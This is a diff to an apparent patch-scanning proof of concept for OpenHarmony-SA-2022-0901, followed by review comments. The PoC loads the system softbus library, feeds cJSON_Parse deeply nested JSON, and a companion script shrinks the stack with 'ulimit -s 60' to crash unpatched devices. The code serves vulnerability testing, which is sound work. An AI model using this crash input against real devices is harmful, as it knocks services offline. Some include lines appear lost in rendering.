diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp
similarity index 78%
rename from demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c
rename to demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp
index 442138216d3d0f3411270fe2d0f1e6f28f32634c..4fdd7523d75d97287a7de8330fd1d394cb038b78 100644
--- a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c
+++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.cpp
@@ -1,4 +1,4 @@
-/*
+/*
  * Copyright (c) 2023 Huawei Device Co., Ltd.
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
@@ -13,12 +13,44 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -// 编译时需要使用-l参数链接cjson共享库 #include -#include +#include +//#include +#include +#include + +/* The cJSON structure: */ +typedef struct cJSON +{ + struct cJSON *next; + struct cJSON *prev; + struct cJSON *child; + int type; + char *valuestring; + int valueint; + double valuedouble; + char *string; +} cJSON; int main() { + void *handle; + // 打开共享库libsoftbus_server.z.so + handle = dlopen("/system/lib/libsoftbus_server.z.so", RTLD_LAZY); + if (!handle) + { + fprintf(stderr, "Error: %s\n", dlerror()); + return 1; + } + + // 获取函数DisplayManager::GetInstance地址 + typedef cJSON* (*Func)(char*); + Func cJSON_Parse = reinterpret_cast(dlsym(handle, "cJSON_Parse")); + if (cJSON_Parse == NULL) { + fprintf(stderr, "Error: %s\n", dlerror()); + dlclose(handle); + return 1; + } // 准备一个具有900层嵌套结构的json数据 char *json_string = "{\"a\":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]}"; @@ -32,7 +64,8 @@ int main() } // 返回值不为null,没有修复漏洞,应该收到signal 11段错误提示 printf("OpenHarmony-SA-2022-0901 : vulnerable\n"); - cJSON_Delete(root); + //cJSON_Delete(root); return 0; } + diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh index a2b1eff38eb65611b59f76d00fd6fdddbb63523c..3636c48f8e672628d846e62c7d1336042ad9048f 100644 --- a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh @@ -19,8 +19,5 @@ #或者也可以继续增加嵌套的层数,使栈溢出,每增加一层会多占用64B的栈空间 ulimit -s 60 -#设置LD_LIBARAY_PATH环境变量,指向cJSON的共享库文件存储位置 -export LD_LIBRARY_PATH=/data/local/tmp - #运行poc可执行程序 ./poc
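Review bot: The comment above the dlsym call, `// 获取函数DisplayManager::GetInstance地址`, names a symbol the code never looks up; the next line resolves `cJSON_Parse`, so the comment should read `// resolve cJSON_Parse from the loaded library`. The function-pointer type `typedef cJSON* (*Func)(char*);` also drops the `const` that cJSON_Parse declares on its parameter; `typedef cJSON *(*Func)(const char *);` matches the library's signature, and since the file is now compiled as C++ after the rename, the context line `char *json_string = "{...}"` should become `const char *json_string = ...` because C++11 no longer permits binding a string literal to a non-const pointer (compilers typically only warn). On the success path the dlopen `handle` is never closed in this hunk — the only `dlclose(handle)` is on the dlsym failure branch — and main's body continues past the hunk, so confirm a close exists further down. The include file names and the template argument of `reinterpret_cast(...)` appear to have been dropped by the page rendering, so the hunk as displayed is not the complete patch text.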
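Review bot: Commenting out `cJSON_Delete(root);` leaves the parsed tree (and the dlopen handle) unreleased on the path that reaches `return 0;`, and commented-out code gives the reader no reason for the omission. Since the second hunk already resolves `cJSON_Parse` with dlsym, `cJSON_Delete` can be resolved the same way if the library exports it: `typedef void (*DeleteFunc)(cJSON *);`, `DeleteFunc cJSON_Delete = reinterpret_cast<DeleteFunc>(dlsym(handle, "cJSON_Delete"));` (with the same NULL check as the parse lookup), and then `cJSON_Delete(root); dlclose(handle);` immediately before `return 0;`. If the call is dropped deliberately because an unpatched library is expected to crash before this line, replace the commented-out line with a one-line comment stating that, e.g. `// cJSON_Delete is intentionally not called: the tree is only reached when the library is patched`.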